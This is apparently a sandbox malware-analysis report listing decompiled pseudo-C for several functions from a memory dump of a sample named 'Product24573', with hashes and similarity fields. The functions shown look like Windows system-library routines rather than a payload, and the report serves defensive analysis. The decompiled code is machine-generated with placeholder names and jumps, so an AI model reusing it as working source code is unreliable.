                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                                          • Instruction ID: 144ad857dc60540f08ce109c92dfb578993011d2b15acd82bf6b79213e51bee0
                                          • Opcode Fuzzy Hash: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                                          • Instruction Fuzzy Hash: BB311632200642AFD72E9B7CCCC4FBABBA9EB89A50F194059E5458B742DB74DC42C761
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 011BEA55 Relevance: .1, Instructions: 111COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 70%
                                          			E011BEA55(intOrPtr* __ecx, char __edx, signed int _a4) {
				signed int _v8;
				char _v12;
				intOrPtr _v15;
				char _v16;
				intOrPtr _v19;
				void* _v28;
				intOrPtr _v36;
				void* __ebx;
				void* __edi;
				signed char _t26;
				signed int _t27;
				char* _t40;
				unsigned int* _t50;
				intOrPtr* _t58;
				unsigned int _t59;
				char _t75;
				signed int _t86;
				intOrPtr _t88;
				intOrPtr* _t91;

				_t75 = __edx;
				_t91 = __ecx;
				_v12 = __edx;
				_t50 = __ecx + 0x30;
				_t86 = _a4 & 0x00000001;
				if(_t86 == 0) {
					E01112280(_t26, _t50);
					_t75 = _v16;
				}
				_t58 = _t91;
				_t27 = E011BE815(_t58, _t75);
				_v8 = _t27;
				if(_t27 != 0) {
					E010FF900(_t91 + 0x34, _t27);
					if(_t86 == 0) {
						E0110FFB0(_t50, _t86, _t50);
					}
					_push( *((intOrPtr*)(_t91 + 4)));
					_push( *_t91);
					_t59 =  *(_v8 + 0x10);
					_t53 = 1 << (_t59 >> 0x00000002 & 0x0000003f);
					_push(0x8000);
					_t11 = _t53 - 1; // 0x0
					_t12 = _t53 - 1; // 0x0
					_v16 = ((_t59 >> 0x00000001 & 1) + (_t59 >> 0xc) << 0xc) - 1 + (1 << (_t59 >> 0x00000002 & 0x0000003f)) - (_t11 + ((_t59 >> 0x00000001 & 1) + (_t59 >> 0x0000000c) << 0x0000000c) & _t12);
					E011BAFDE( &_v12,  &_v16);
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					E011BBCD2(_v8,  *_t91,  *((intOrPtr*)(_t91 + 4)));
					_t55 = _v36;
					_t88 = _v36;
					if(E01117D50() == 0) {
						_t40 = 0x7ffe0388;
					} else {
						_t55 = _v19;
						_t40 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t40 != 0) {
						E011AFE3F(_t55, _t91, _v15, _t55);
					}
				} else {
					if(_t86 == 0) {
						E0110FFB0(_t50, _t86, _t50);
						_t75 = _v16;
					}
					_push(_t58);
					_t88 = 0;
					_push(0);
					E011BA80D(_t91, 8, _t75, 0);
				}
				return _t88;
			}






















                                          0x011bea55
                                          0x011bea66
                                          0x011bea68
                                          0x011bea6c
                                          0x011bea6f
                                          0x011bea72
                                          0x011bea75
                                          0x011bea7a
                                          0x011bea7a
                                          0x011bea7e
                                          0x011bea80
                                          0x011bea85
                                          0x011bea8b
                                          0x011beab5
                                          0x011beabc
                                          0x011beabf
                                          0x011beabf
                                          0x011beaca
                                          0x011beace
                                          0x011bead0
                                          0x011beae4
                                          0x011beaeb
                                          0x011beaf0
                                          0x011beaf5
                                          0x011beb09
                                          0x011beb0d
                                          0x011beb1d
                                          0x011beb2d
                                          0x011beb38
                                          0x011beb3d
                                          0x011beb41
                                          0x011beb4a
                                          0x011beb60
                                          0x011beb4c
                                          0x011beb52
                                          0x011beb59
                                          0x011beb59
                                          0x011beb68
                                          0x011beb71
                                          0x011beb71
                                          0x011bea8d
                                          0x011bea8f
                                          0x011bea92
                                          0x011bea97
                                          0x011bea97
                                          0x011bea9b
                                          0x011bea9c
                                          0x011bea9e
                                          0x011beaa6
                                          0x011beaa6
                                          0x011beb7e

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                                          • Instruction ID: 5ad473fb72803a3309ffdbfc4cf2ffa27fcbf25087623af0bb25d8f2fd4a505e
                                          • Opcode Fuzzy Hash: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                                          • Instruction Fuzzy Hash: 06319076605706ABC72DDF28C8C0AABB7AAFBC4214F04492DF55687785DF30E805CBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 011769A6 Relevance: .1, Instructions: 108COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 69%
                                          			E011769A6(signed short* __ecx, void* __eflags) {
				signed int _v8;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				char* _v44;
				signed int _v48;
				intOrPtr _v52;
				signed int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				char _v72;
				signed short* _v76;
				signed int _v80;
				char _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t68;
				intOrPtr _t73;
				signed short* _t74;
				void* _t77;
				void* _t78;
				signed int _t79;
				signed int _t80;

				_v8 =  *0x11ed360 ^ _t80;
				_t75 = 0x100;
				_v64 = _v64 & 0x00000000;
				_v76 = __ecx;
				_t79 = 0;
				_t68 = 0;
				_v72 = 1;
				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
				_t77 = 0;
				if(L01106C59(__ecx[2], 0x100, __eflags) != 0) {
					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
					if(_t79 != 0 && E01176BA3() != 0) {
						_push(0);
						_push(0);
						_push(0);
						_push(0x1f0003);
						_push( &_v64);
						if(E01139980() >= 0) {
							E01112280(_t56, 0x11e8778);
							_t77 = 1;
							_t68 = 1;
							if( *0x11e8774 == 0) {
								asm("cdq");
								 *(_t79 + 0xf70) = _v64;
								 *(_t79 + 0xf74) = 0x100;
								_t75 = 0;
								_t73 = 4;
								_v60 =  &_v68;
								_v52 = _t73;
								_v36 = _t73;
								_t74 = _v76;
								_v44 =  &_v72;
								 *0x11e8774 = 1;
								_v56 = 0;
								_v28 = _t74[2];
								_v48 = 0;
								_v20 = ( *_t74 & 0x0000ffff) + 2;
								_v40 = 0;
								_v32 = 0;
								_v24 = 0;
								_v16 = 0;
								if(E010FB6F0(0x10dc338, 0x10dc288, 3,  &_v60) == 0) {
									_v80 = _v80 | 0xffffffff;
									_push( &_v84);
									_push(0);
									_push(_v64);
									_v84 = 0xfa0a1f00;
									E01139520();
								}
							}
						}
					}
				}
				if(_v64 != 0) {
					_push(_v64);
					E011395D0();
					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
				}
				if(_t77 != 0) {
					E0110FFB0(_t68, _t77, 0x11e8778);
				}
				_pop(_t78);
				return E0113B640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
			}
































                                          0x011769b5
                                          0x011769be
                                          0x011769c3
                                          0x011769c9
                                          0x011769cc
                                          0x011769d1
                                          0x011769d3
                                          0x011769de
                                          0x011769e1
                                          0x011769ea
                                          0x011769f6
                                          0x011769fe
                                          0x01176a13
                                          0x01176a14
                                          0x01176a15
                                          0x01176a16
                                          0x01176a1e
                                          0x01176a26
                                          0x01176a31
                                          0x01176a36
                                          0x01176a37
                                          0x01176a40
                                          0x01176a49
                                          0x01176a4a
                                          0x01176a53
                                          0x01176a59
                                          0x01176a5d
                                          0x01176a5e
                                          0x01176a64
                                          0x01176a67
                                          0x01176a6a
                                          0x01176a6d
                                          0x01176a70
                                          0x01176a77
                                          0x01176a7d
                                          0x01176a86
                                          0x01176a89
                                          0x01176a9c
                                          0x01176a9f
                                          0x01176aa2
                                          0x01176aa5
                                          0x01176aaf
                                          0x01176ab1
                                          0x01176ab8
                                          0x01176ab9
                                          0x01176abb
                                          0x01176abe
                                          0x01176ac5
                                          0x01176ac5
                                          0x01176aaf
                                          0x01176a40
                                          0x01176a26
                                          0x011769fe
                                          0x01176ace
                                          0x01176ad0
                                          0x01176ad3
                                          0x01176ad8
                                          0x01176adf
                                          0x01176adf
                                          0x01176ae8
                                          0x01176aef
                                          0x01176aef
                                          0x01176af9
                                          0x01176b06

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 614e73d0453dad8be7eac773efcfde123e1959b7de8854bfcb929b4743e0f148
                                          • Instruction ID: 3f51ea8dc492dff07c8c775aef2976ec276950c4f71fd96a48a63bdeaffbb2b8
                                          • Opcode Fuzzy Hash: 614e73d0453dad8be7eac773efcfde123e1959b7de8854bfcb929b4743e0f148
                                          • Instruction Fuzzy Hash: 17419DB1D00609AFEB28DFA9D940BFEBBF4EF48718F14852AE914A7240DB749945CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010F5210 Relevance: .1, Instructions: 107COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 85%
                                          			E010F5210(intOrPtr _a4, void* _a8) {
				void* __ecx;
				intOrPtr _t31;
				signed int _t32;
				signed int _t33;
				intOrPtr _t35;
				signed int _t52;
				void* _t54;
				void* _t56;
				unsigned int _t59;
				signed int _t60;
				void* _t61;

				_t61 = E010F52A5(1);
				if(_t61 == 0) {
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					_t54 =  *((intOrPtr*)(_t31 + 0x28));
					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
				} else {
					_t54 =  *((intOrPtr*)(_t61 + 0x10));
					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
				}
				_t60 = _t59 >> 1;
				_t32 = 0x3a;
				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
					_t52 = _t60 + _t60;
					if(_a4 > _t52) {
						goto L5;
					}
					if(_t61 != 0) {
						asm("lock xadd [esi], eax");
						if((_t32 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E011395D0();
							L011177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					} else {
						E0110EB70(_t54, 0x11e79a0);
					}
					_t26 = _t52 + 2; // 0xddeeddf0
					return _t26;
				} else {
					_t52 = _t60 + _t60;
					if(_a4 < _t52) {
						if(_t61 != 0) {
							asm("lock xadd [esi], eax");
							if((_t32 | 0xffffffff) == 0) {
								_push( *((intOrPtr*)(_t61 + 4)));
								E011395D0();
								L011177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
							}
						} else {
							E0110EB70(_t54, 0x11e79a0);
						}
						return _t52;
					}
					L5:
					_t33 = E0113F3E0(_a8, _t54, _t52);
					if(_t61 == 0) {
						E0110EB70(_t54, 0x11e79a0);
					} else {
						asm("lock xadd [esi], eax");
						if((_t33 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E011395D0();
							L011177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					}
					_t35 = _a8;
					if(_t60 <= 1) {
						L9:
						_t60 = _t60 - 1;
						 *((short*)(_t52 + _t35 - 2)) = 0;
						goto L10;
					} else {
						_t56 = 0x3a;
						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
							 *((short*)(_t52 + _t35)) = 0;
							L10:
							return _t60 + _t60;
						}
						goto L9;
					}
				}
			}














                                          0x010f5220
                                          0x010f5224
                                          0x01150d13
                                          0x01150d16
                                          0x01150d19
                                          0x010f522a
                                          0x010f522a
                                          0x010f522d
                                          0x010f522d
                                          0x010f5231
                                          0x010f5235
                                          0x010f5239
                                          0x01150d5c
                                          0x01150d62
                                          0x00000000
                                          0x00000000
                                          0x01150d6a
                                          0x01150d7b
                                          0x01150d7f
                                          0x01150d81
                                          0x01150d84
                                          0x01150d95
                                          0x01150d95
                                          0x01150d6c
                                          0x01150d71
                                          0x01150d71
                                          0x01150d9a
                                          0x00000000
                                          0x010f524a
                                          0x010f524a
                                          0x010f5250
                                          0x01150d24
                                          0x01150d35
                                          0x01150d39
                                          0x01150d3b
                                          0x01150d3e
                                          0x01150d50
                                          0x01150d50
                                          0x01150d26
                                          0x01150d2b
                                          0x01150d2b
                                          0x00000000
                                          0x01150d55
                                          0x010f5256
                                          0x010f525b
                                          0x010f5265
                                          0x01150da7
                                          0x010f526b
                                          0x010f526e
                                          0x010f5272
                                          0x01150db1
                                          0x01150db4
                                          0x01150dc5
                                          0x01150dc5
                                          0x010f5272
                                          0x010f5278
                                          0x010f527e
                                          0x010f528a
                                          0x010f528c
                                          0x010f528d
                                          0x00000000
                                          0x010f5280
                                          0x010f5282
                                          0x010f5288
                                          0x010f529f
                                          0x010f5292
                                          0x00000000
                                          0x010f5292
                                          0x00000000
                                          0x010f5288
                                          0x010f527e

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 191b20633673b406327a7e4843fa18882e6a38a64aa7a0e32d7e11d3eff5c338
                                          • Instruction ID: b389ed4f326123029096a92bef114cb98db4430e1352bb76562ca0ed6ff62970
                                          • Opcode Fuzzy Hash: 191b20633673b406327a7e4843fa18882e6a38a64aa7a0e32d7e11d3eff5c338
                                          • Instruction Fuzzy Hash: BC314831641A01DBC7AAAB58CC41B6E77A5FF15764F114B2EF9650B5E0EB70E800C690
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01133D43 Relevance: .1, Instructions: 106COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E01133D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				char _v12;
				signed short** _t33;
				short* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				signed short _t43;
				intOrPtr* _t47;
				intOrPtr* _t53;
				signed short _t57;
				intOrPtr _t58;
				signed short _t60;
				signed short* _t61;

				_t47 = __ecx;
				_t61 = __edx;
				_t60 = ( *__ecx & 0x0000ffff) + 2;
				if(_t60 > 0xfffe) {
					L22:
					return 0xc0000106;
				}
				if(__edx != 0) {
					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
						L5:
						E01107B60(0, _t61, 0x10d11c4);
						_v12 =  *_t47;
						_v12 = _v12 + 0xfff8;
						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
						E01107B60(0xfff8, _t61,  &_v12);
						_t33 = _a8;
						if(_t33 != 0) {
							 *_t33 = _t61;
						}
						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
						_t53 = _a12;
						if(_t53 != 0) {
							_t57 = _t61[2];
							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
							while(_t38 >= _t57) {
								if( *_t38 == 0x5c) {
									_t41 = _t38 + 2;
									if(_t41 == 0) {
										break;
									}
									_t58 = 0;
									if( *_t41 == 0) {
										L19:
										 *_t53 = _t58;
										goto L7;
									}
									 *_t53 = _t41;
									goto L7;
								}
								_t38 = _t38 - 2;
							}
							_t58 = 0;
							goto L19;
						} else {
							L7:
							_t39 = _a16;
							if(_t39 != 0) {
								 *_t39 = 0;
								 *((intOrPtr*)(_t39 + 4)) = 0;
								 *((intOrPtr*)(_t39 + 8)) = 0;
								 *((intOrPtr*)(_t39 + 0xc)) = 0;
							}
							return 0;
						}
					}
					_t61 = _a4;
					if(_t61 != 0) {
						L3:
						_t43 = L01114620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
						_t61[2] = _t43;
						if(_t43 == 0) {
							return 0xc0000017;
						}
						_t61[1] = _t60;
						 *_t61 = 0;
						goto L5;
					}
					goto L22;
				}
				_t61 = _a4;
				if(_t61 == 0) {
					return 0xc000000d;
				}
				goto L3;
			}
















                                          0x01133d4c
                                          0x01133d50
                                          0x01133d55
                                          0x01133d5e
                                          0x0116e79a
                                          0x00000000
                                          0x0116e79a
                                          0x01133d68
                                          0x0116e789
                                          0x01133d9d
                                          0x01133da3
                                          0x01133daf
                                          0x01133db5
                                          0x01133dbc
                                          0x01133dc4
                                          0x01133dc9
                                          0x01133dce
                                          0x0116e7ae
                                          0x0116e7ae
                                          0x01133dde
                                          0x01133de2
                                          0x01133de7
                                          0x01133e0d
                                          0x01133e13
                                          0x01133e16
                                          0x01133e1e
                                          0x01133e25
                                          0x01133e28
                                          0x00000000
                                          0x00000000
                                          0x01133e2a
                                          0x01133e2f
                                          0x01133e37
                                          0x01133e37
                                          0x00000000
                                          0x01133e37
                                          0x01133e31
                                          0x00000000
                                          0x01133e31
                                          0x01133e20
                                          0x01133e20
                                          0x01133e35
                                          0x00000000
                                          0x01133de9
                                          0x01133de9
                                          0x01133de9
                                          0x01133dee
                                          0x01133dfd
                                          0x01133dff
                                          0x01133e02
                                          0x01133e05
                                          0x01133e05
                                          0x00000000
                                          0x01133df0
                                          0x01133de7
                                          0x0116e78f
                                          0x0116e794
                                          0x01133d79
                                          0x01133d84
                                          0x01133d89
                                          0x01133d8e
                                          0x00000000
                                          0x0116e7a4
                                          0x01133d96
                                          0x01133d9a
                                          0x00000000
                                          0x01133d9a
                                          0x00000000
                                          0x0116e794
                                          0x01133d6e
                                          0x01133d73
                                          0x00000000
                                          0x0116e7b5
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 854013fc187303ee4aeddd1613a74a33e58b431422c06cbefddd9156ac3214df
                                          • Instruction ID: 51b2d9ee83a9659c5f70c698b2caf769fdaa3475f7a37416399c6b0945bcbc57
                                          • Opcode Fuzzy Hash: 854013fc187303ee4aeddd1613a74a33e58b431422c06cbefddd9156ac3214df
                                          • Instruction Fuzzy Hash: A931ED31A11621DBC72DCF2DC845A2ABBA5FF85710B06807AE96ACB394E734D840C7A5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0112A61C Relevance: .1, Instructions: 106COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 78%
                                          			E0112A61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				intOrPtr _t39;
				intOrPtr _t45;
				intOrPtr* _t51;
				intOrPtr* _t52;
				intOrPtr* _t55;
				signed int _t57;
				intOrPtr* _t59;
				intOrPtr _t68;
				intOrPtr* _t77;
				void* _t79;
				signed int _t80;
				intOrPtr _t81;
				char* _t82;
				void* _t83;

				_push(0x24);
				_push(0x11d0220);
				E0114D08C(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
				_t79 = __ecx;
				_t35 =  *0x11e7b9c; // 0x0
				_t55 = L01114620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
				if(_t55 == 0) {
					_t39 = 0xc0000017;
					L11:
					return E0114D0D1(_t39);
				}
				_t68 = 0;
				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
				 *(_t83 - 4) =  *(_t83 - 4) & 0;
				_t7 = _t55 + 8; // 0x8
				_t57 = 6;
				memcpy(_t7, _t79, _t57 << 2);
				_t80 = 0xfffffffe;
				 *(_t83 - 4) = _t80;
				if(0 < 0) {
					L14:
					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
					L20:
					L011177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
					_t39 = _t81;
					goto L11;
				}
				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
					_t81 = 0xc000007b;
					goto L20;
				}
				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
					_t59 =  *((intOrPtr*)(_t83 + 8));
					_t45 =  *_t59;
					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
					 *_t59 = _t45 + 1;
					L6:
					 *(_t83 - 4) = 1;
					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
					 *(_t83 - 4) = _t80;
					if(_t68 < 0) {
						_t82 =  *((intOrPtr*)(_t83 + 0xc));
						if(_t82 == 0) {
							goto L14;
						}
						asm("btr eax, ecx");
						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
						if( *_t82 != 0) {
							 *0x11e7b10 =  *0x11e7b10 - 8;
						}
						goto L20;
					}
					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
					_t51 =  *0x11e536c; // 0x77995368
					if( *_t51 != 0x11e5368) {
						_push(3);
						asm("int 0x29");
						goto L14;
					}
					 *_t55 = 0x11e5368;
					 *((intOrPtr*)(_t55 + 4)) = _t51;
					 *_t51 = _t55;
					 *0x11e536c = _t55;
					_t52 =  *((intOrPtr*)(_t83 + 0x10));
					if(_t52 != 0) {
						 *_t52 = _t55;
					}
					_t39 = 0;
					goto L11;
				}
				_t77 =  *((intOrPtr*)(_t83 + 8));
				_t68 = E0112A70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
				if(_t68 < 0) {
					goto L14;
				}
				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
				goto L6;
			}


















                                          0x0112a61c
                                          0x0112a61e
                                          0x0112a623
                                          0x0112a628
                                          0x0112a62b
                                          0x0112a62d
                                          0x0112a648
                                          0x0112a64a
                                          0x0112a64f
                                          0x01169b44
                                          0x0112a6ec
                                          0x0112a6f1
                                          0x0112a6f1
                                          0x0112a655
                                          0x0112a657
                                          0x0112a65a
                                          0x0112a65d
                                          0x0112a662
                                          0x0112a663
                                          0x0112a667
                                          0x0112a668
                                          0x0112a66d
                                          0x0112a706
                                          0x0112a706
                                          0x01169bda
                                          0x01169be6
                                          0x01169beb
                                          0x00000000
                                          0x01169beb
                                          0x0112a679
                                          0x01169b7a
                                          0x00000000
                                          0x01169b7a
                                          0x0112a683
                                          0x0112a6f4
                                          0x0112a6f7
                                          0x0112a6f9
                                          0x0112a6fd
                                          0x0112a6a0
                                          0x0112a6a0
                                          0x0112a6ad
                                          0x0112a6af
                                          0x0112a6b4
                                          0x01169ba7
                                          0x01169bac
                                          0x00000000
                                          0x00000000
                                          0x01169bc6
                                          0x01169bce
                                          0x01169bd1
                                          0x01169bd3
                                          0x01169bd3
                                          0x00000000
                                          0x01169bd1
                                          0x0112a6bd
                                          0x0112a6c3
                                          0x0112a6c6
                                          0x0112a6d2
                                          0x0112a701
                                          0x0112a704
                                          0x00000000
                                          0x0112a704
                                          0x0112a6d4
                                          0x0112a6d6
                                          0x0112a6d9
                                          0x0112a6db
                                          0x0112a6e1
                                          0x0112a6e6
                                          0x0112a6e8
                                          0x0112a6e8
                                          0x0112a6ea
                                          0x00000000
                                          0x0112a6ea
                                          0x0112a688
                                          0x0112a692
                                          0x0112a694
                                          0x0112a699
                                          0x00000000
                                          0x00000000
                                          0x0112a69d
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7b6799da957254a8b09748cd87a34a42e1b461e6281087f53b3aa65bccf67248
                                          • Instruction ID: e50d0a7ea8914db1c5c284204a6fb6a1154f4d8be50cb9510e617a230b1ad057
                                          • Opcode Fuzzy Hash: 7b6799da957254a8b09748cd87a34a42e1b461e6281087f53b3aa65bccf67248
                                          • Instruction Fuzzy Hash: D841AB75A00219DFCB1DCF98D480B99BBF2BF48308F198069EA04AF344C375A951CF90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0111C182 Relevance: .1, Instructions: 104COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 68%
                                          			E0111C182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
				signed int* _v8;
				char _v16;
				void* __ebx;
				void* __edi;
				signed char _t33;
				signed char _t43;
				signed char _t48;
				signed char _t62;
				void* _t63;
				intOrPtr _t69;
				intOrPtr _t71;
				unsigned int* _t82;
				void* _t83;

				_t80 = __ecx;
				_t82 = __edx;
				_t33 =  *((intOrPtr*)(__ecx + 0xde));
				_t62 = _t33 >> 0x00000001 & 0x00000001;
				if((_t33 & 0x00000001) != 0) {
					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
					if(E01117D50() != 0) {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					} else {
						_t43 = 0x7ffe0386;
					}
					if( *_t43 != 0) {
						_t43 = E011C8D34(_v8, _t80);
					}
					E01112280(_t43, _t82);
					if( *((char*)(_t80 + 0xdc)) == 0) {
						E0110FFB0(_t62, _t80, _t82);
						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
						_t30 = _t80 + 0xd0; // 0xd0
						_t83 = _t30;
						E011C8833(_t83,  &_v16);
						_t81 = _t80 + 0x90;
						E0110FFB0(_t62, _t80 + 0x90, _t80 + 0x90);
						_t63 = 0;
						_push(0);
						_push(_t83);
						_t48 = E0113B180();
						if(_a4 != 0) {
							E01112280(_t48, _t81);
						}
					} else {
						_t69 = _v8;
						_t12 = _t80 + 0x98; // 0x98
						_t13 = _t69 + 0xc; // 0x575651ff
						E0111BB2D(_t13, _t12);
						_t71 = _v8;
						_t15 = _t80 + 0xb0; // 0xb0
						_t16 = _t71 + 8; // 0x8b000cc2
						E0111BB2D(_t16, _t15);
						E0111B944(_v8, _t62);
						 *((char*)(_t80 + 0xdc)) = 0;
						E0110FFB0(0, _t80, _t82);
						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
						 *(_t80 + 0xde) = 0;
						if(_a4 == 0) {
							_t25 = _t80 + 0x90; // 0x90
							E0110FFB0(0, _t80, _t25);
						}
						_t63 = 1;
					}
					return _t63;
				}
				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
				if(_a4 == 0) {
					_t24 = _t80 + 0x90; // 0x90
					E0110FFB0(0, __ecx, _t24);
				}
				return 0;
			}
















                                          0x0111c18d
                                          0x0111c18f
                                          0x0111c191
                                          0x0111c19b
                                          0x0111c1a0
                                          0x0111c1d4
                                          0x0111c1de
                                          0x01162d6e
                                          0x0111c1e4
                                          0x0111c1e4
                                          0x0111c1e4
                                          0x0111c1ec
                                          0x01162d7d
                                          0x01162d7d
                                          0x0111c1f3
                                          0x0111c1ff
                                          0x01162d88
                                          0x01162d8d
                                          0x01162d94
                                          0x01162d94
                                          0x01162d9f
                                          0x01162da4
                                          0x01162dab
                                          0x01162db0
                                          0x01162db2
                                          0x01162db3
                                          0x01162db4
                                          0x01162dbc
                                          0x01162dc3
                                          0x01162dc3
                                          0x0111c205
                                          0x0111c205
                                          0x0111c208
                                          0x0111c20e
                                          0x0111c211
                                          0x0111c216
                                          0x0111c219
                                          0x0111c21f
                                          0x0111c222
                                          0x0111c22c
                                          0x0111c234
                                          0x0111c23a
                                          0x0111c23f
                                          0x0111c245
                                          0x0111c24b
                                          0x0111c251
                                          0x0111c25a
                                          0x0111c276
                                          0x0111c27d
                                          0x0111c27d
                                          0x0111c25c
                                          0x0111c25c
                                          0x00000000
                                          0x0111c25e
                                          0x0111c1a4
                                          0x0111c1aa
                                          0x0111c1b3
                                          0x0111c265
                                          0x0111c26c
                                          0x0111c26c
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
